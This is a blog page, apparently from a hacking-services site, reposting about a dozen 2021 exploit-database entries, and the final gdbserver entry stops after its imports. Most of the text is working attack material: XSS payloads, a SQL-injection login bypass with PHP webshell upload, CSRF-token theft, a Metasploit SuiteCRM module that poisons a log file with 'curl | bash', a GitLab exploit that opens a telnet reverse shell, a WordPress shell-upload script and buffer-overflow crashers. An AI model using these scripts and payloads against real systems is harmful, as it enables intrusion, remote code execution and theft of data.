Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130496

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.
HireHackking 
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner():
	print('''

 _____       _ _              _                       _                     _____  ______ _____ _____ 
|  _  |     | (_)            | |                     (_)                   / __  \ | ___ /  __ |  ___|
| | | |_ __ | |_ _ __   ___  | | ___  __ _ _ __ _ __  _ _ __   __ _  __   _`' / /' | |_/ | /  \| |__  
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / /   |    /| |   |  __| 
\ \_/ | | | | | | | | |  __/ | |  __| (_| | |  | | | | | | | | (_| |  \ V /./ /___ | |\ \| \__/| |___ 
 \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_|  |_| |_|_|_| |_|\__, |   \_/ \_____/ \_| \_|\____\____/ 
                                                               __/ |                                  
                                                              |___/                                   
		Written by djebbaranon 
		twitter :  @dj3bb4ran0n1
		zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args():
	parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
	parser.add_argument("-u","--url",type=str,required=True,help="url of target")
	parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
	parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
	my_arguments = parser.parse_args()
	return my_arguments
def login_with_sqli_login_bypass(user,passw):
	global session
	global url
	global cookies
	url = my_args().url
	session = requests.Session()
	data = {
	"username" : user,
	"password" : passw,
	}
	try:
		response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
		print( Fore.GREEN + "[+] Logged in succsusfully")
		cookies = response.cookies.get_dict()
		print("[+] your cookie : ")
	except requests.HTTPError as exception:
		print(Fore.RED + "[-] HTTP Error : {}".format(exception))
		sys.exit(1)
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
	try:
		payload ={
			"id" : "",
			"faculty_id" : "test",
			"firstname" : "test",
			"lastname" : "test",
			"middlename" : "fsdfsd",
			"dob" : "2021-10-29",
			"gender": "Male",
			"department_id" : "1",
			"email" : "zebi@gmail.com",
			"contact" : "zebii",
			"address" :  "zebii",	
		}
		files = {
			"img" :
				(
					shell_name,
					"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
					"application/octet-stream",
					)
		}
		vunlerable_file = "/classes/Master.php?f=save_faculty"
		print("[*] Trying to upload webshell ....")
		response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
		print("[+] trying to bruteforce the webshell ....")
		rangee = my_args().range
		for i in range(0,rangee):
			try:
				with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
					if "nikmok" in response3.text and response3.status_code == 200:
						print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
						break
						with open("shell.txt",mode="w+") as writer:
							writer.write(response3.url)
					else:
						print( Fore.RED + "[-] shell not found : " + response3.url)
			except requests.HTTPError as exception2:
				print("[-] HTTP Error : {0} ".format(exception2))
	except requests.HTTPError as error:
		print("[-] HTTP Error : ".format(error))
	command = my_args().command
	with requests.get(response3.url.replace("whoami",command)) as response4:
		print("[*] Executing {} ....".format(command))
		time.sleep(3)
		print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")
HireHackking 
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }
	//
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tels it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
	//Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}
getTokenJS();

var POST_URL="/"
getTokenJS();

</script>
</html>

3- Save it as Html file and upload it.
HireHackking 
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections

Proof of concepts : 

Stored Xss Example: 

1-Login to you'r Dashboard As a low privilege user
2-Click On Basic archives and Employee
3- +Add card Employee
4- Enter your xss payload in parameters
5-On added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}


------------------------------------------------------------------------


File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab



Request: 
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
	 xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
	c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
	c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
	c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
	c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
	c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
	c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
	c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
	c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
	c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
	c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
	c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
	c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
	c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
	z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
	C434.693,207.929,439.613,203.01,445.731,203.01z"/>
	<script>alert(1)</script>
</svg>
HireHackking 
# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
# Date: 19/10/2021
# Exploit Author: Vasu (tamilan_mkv)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
# Version: bludit-3-13-1
# Tested on: kali linux
# CVE : CVE-2021-35323

### Steps to reproduce

1. Open login page http://localhost:800/admin/login;
2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password
3. Trigger the malicious javascript code
HireHackking 
# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 21/04/2021
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Version: 6.7
# Tested on: Windows 8.1, Kali Linux, Burp Suite

Steps to Reproduce:

1. At first login to your panel
2. then click the "Sliders" menu to "New Slider"
3. now intercept with the burp suite and save a new slider
4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value.
5. Now Generate a CSRF POC

<!DOCTYPE html>
<html>
<body>
  <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST">
    <input type="hidden" name="iSlider" value="">
    <input type="hidden" name="aFile" filename="">
    <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg">
    <input type="hidden" name="sDescription"
value="test</textarea><script>alert(document.cookie)</script>">
    <input type="hidden" name="iPosition" value="1">
    <input type="hidden" name="sOption" value="save">
    <input type="submit" value="submit">
  </form>
</body>
</html>
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SuiteCRM Log File Remote Code Execution',
        'Description' => %q{
          This module exploits an input validation error on the log file extension parameter. It does
          not properly validate upper/lower case characters. Once this occurs, the application log file
          will be treated as a php file. The log file can then be populated with php code by changing the
          username of a valid user, as this info is logged. The php code in the file can then be executed
          by sending an HTTP request to the log file. A similar issue was reported by the same researcher
          where a blank file extension could be supplied and the extension could be provided in the file
          name. This exploit will work on those versions as well, and those references are included.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'M. Cory Billington' # @_th3y
        ],
        'References' => [
          ['CVE', '2021-42840'],
          ['CVE', '2020-28328'], # First CVE
          ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
          ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
          ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
        ],
        'Platform' => %w[linux unix],
        'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
        'Targets' => [
          [
            'Linux (x64)', {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Linux (cmd)', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true,
        'DisclosureDate' => '2021-04-28',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
        OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
        OptString.new('PASS', [true, 'Password for administrator', 'admin']),
        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
      ]
    )
  end

  def check
    authenticate unless @authenticated
    return Exploit::CheckCode::Unknown unless @authenticated

    version_check_request = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Home',
          'action' => 'About'
        }
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request

    version_match = version_check_request.body[/
      Version
      \s
      \d{1} # Major revision
      \.
      \d{1,2} # Minor revision
      \.
      \d{1,2} # Bug fix release
      /x]

    version = version_match.partition(' ').last

    if version.nil? || version.empty?
      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
      return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
    end

    patched_version = Rex::Version.new('7.11.18')
    current_version = Rex::Version.new(version)

    return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version

    Exploit::CheckCode::Safe("SuiteCRM #{version}")
  end

  def authenticate
    print_status("Authenticating as #{datastore['USER']}")
    initial_req = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Users',
          'action' => 'Login'
        }
      }
    )

    return false unless initial_req && initial_req.code == 200

    login = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_post' => {
          'module' => 'Users',
          'action' => 'Authenticate',
          'return_module' => 'Users',
          'return_action' => 'Login',
          'user_name' => datastore['USER'],
          'username_password' => datastore['PASS'],
          'Login' => 'Log In'
        }
      }
    )

    return false unless login && login.code == 302

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Administration',
          'action' => 'index'
        }
      }
    )

    auth_succeeded?(res)
  end

  def auth_succeeded?(res)
    return false unless res

    if res.code == 200
      print_good("Authenticated as: #{datastore['USER']}")
      if res.body.include?('Unauthorized access to administration.')
        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
        @is_admin = false
      else
        print_good("#{datastore['USER']} has administrative rights.")
        @is_admin = true
      end
      @authenticated = true
      return true
    else
      print_error("Failed to authenticate as: #{datastore['USER']}")
      return false
    end
  end

  def post_log_file(data)
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'ctype' => "multipart/form-data; boundary=#{data.bound}",
        'keep_cookies' => true,
        'headers' => {
          'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
        },
        'data' => data.to_s
      }
    )
  end

  def modify_system_settings_file
    filename = rand_text_alphanumeric(8).to_s
    extension = '.pHp'
    @php_fname = filename + extension
    action = 'Modify system settings file'
    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
    data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('info', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')

    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  def poison_log_file
    action = 'Poison log file'
    if target.arch.first == 'cmd'
      command_injection = "<?php `curl #{@download_url} | bash`; ?>"
    else
      @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
      command_injection = %(
        <?php `curl #{@download_url} -o #{@meterpreter_fname};
        /bin/chmod 700 #{@meterpreter_fname};
        /bin/sh -c #{@meterpreter_fname};`; ?>
      )
    end

    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')

    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  def restore
    action = 'Restore logging to default configuration'
    print_status("Trying - #{action}")

    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
    data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')

    post_log_file(data)

    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')

    res = post_log_file(data)

    print_error("Failed - #{action}") unless res && res.code == 301

    print_good("Succeeded - #{action}")
  end

  def check_logfile_request(res, action)
    fail_with(Failure::Unknown, "#{action} - no reply") unless res

    unless res.code == 301
      print_error("Failed - #{action}")
      fail_with(Failure::UnexpectedReply, "Failed - #{action}")
    end

    print_good("Succeeded - #{action}")
  end

  def execute_php
    print_status("Executing php code in log file: #{@php_fname}")
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri, @php_fname),
        'keep_cookies' => true
      }
    )
    fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
    register_files_for_cleanup(@php_fname)
    register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
  end

  def on_request_uri(cli, _request)
    send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
    print_good("#{peer} - Payload sent!")
  end

  def start_http_server
    start_service(
      {
        'Uri' => {
          'Proc' => proc do |cli, req|
            on_request_uri(cli, req)
          end,
          'Path' => resource_uri
        }
      }
    )
    @download_url = get_uri
  end

  def exploit
    start_http_server
    authenticate unless @authenticated
    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
    fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
    modify_system_settings_file
    poison_log_file
    execute_php
  ensure
    restore if datastore['RESTORECONF']
  end
end
HireHackking 
# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
# Date: 11/01/2021
# Exploit Author: Jacob Baines
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/gitlab-org/gitlab
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
# CVE : CVE-2021-22205
# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed

Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.

1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.

echo -e
"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
| base64 -d > lol.jpg
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
echo -n
"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
| base64 -d >> lol.jpg

2. Sending the payload. Any random endpoint will do.

curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)

2a. Sample Output from the reverse shell:

$ nc -lnvp 1270
Listening on [0.0.0.0] (family 0, port 1270)
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
34836)
whoami
git
id
uid=998(git) gid=998(git) groups=998(git)
HireHackking 
# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: http://www.ipuptime.net/
# Software Link : http://ipuptime.net/PinkieSetup.zip
# Tested Version: 2.15
# Vulnerability Type:  Buffer Overflow (DoS) Remote
# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Pinkie 2.15 TFTP Remote Buffer Overflow

# Steps to reproduce:
# 1. - Download and install Pinkie 2.15
# 2. - Start TFTP Server listening on port 69
# 3. - Run the Script from remote PC/IP
# 4. - Crashed


#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

read = (
    #Request - read
    b'\x00\x01'  #Static - opcode
    + b')' * 32768 +  #String - source_file (mutant, size=32768, orig val: b'File.bin')
    b'\x00'  #Delim - delim1
    b'netascii'  #String - transfer_mode
    b'\x00'  #Delim - delim2
)
sock.sendto(read, ('192.168.1.207', 69))
sock.recv(65535)

sock.close()
HireHackking 
# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

import os.path
from os import path
import json
import requests;
import time
import sys

def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage():
	print("Usage: python3 exploit.py [target url] [your shell]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text

	if ("No script kiddies please!!" in raw):
		return False;
	else:
		return True;

def main():

	banner()
	if(len(sys.argv) != 3):
		usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'sprw_file_upload_action'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowedExtensions[0]" : "jpg",
    "allowedExtensions[1]" : "php4",
    "allowedExtensions[2]" : "phtml",
    "allowedExtensions[3]" : "png",
	"qqfile" : "files",
    "element_id" : "6837",
    "sizeLimit" : "12000000",
    "file_uploader_nonce" : "2b102311b7"
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data )
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		print("Shell URL on your Review/Comment");
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();
HireHackking 
# Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: https://www.modbustools.com/
# Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Tested Version: 7.3.1 < 7.4.2
# Vulnerability Type: Buffer Overflow (DoS) Local
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow

# Steps to reproduce:
# 1. - Download and install Modbus Slave
# 2. - Run the python script and it will create modbus.txt file.
# 3. - Modbus Slave 7.3.1 < 7.4.2
# 4. - Connection -> Connect
# 5. - Paste the characters of txt file Registration Key 
# 6. - press "ok" button
# 7. - Crashed

#!/usr/bin/python

exploit = 'A' * 736

try: 
    file = open("Modbus.txt","w")
    file.write(exploit)
    file.close()

    print("POC is created")
except:
    print("POC not created")
HireHackking 
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3


import binascii
import socket
import struct
